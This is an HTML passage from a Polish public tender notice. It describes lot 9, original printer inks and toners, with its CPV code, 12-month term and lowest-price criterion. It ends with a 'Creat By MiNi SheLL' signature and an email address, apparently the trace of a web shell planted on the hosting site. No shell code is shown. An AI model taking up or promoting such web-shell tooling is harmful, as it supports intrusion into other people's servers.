<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Tusze i tonery oryginały.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowo okreslone w załączniku Nr 1 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.60.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com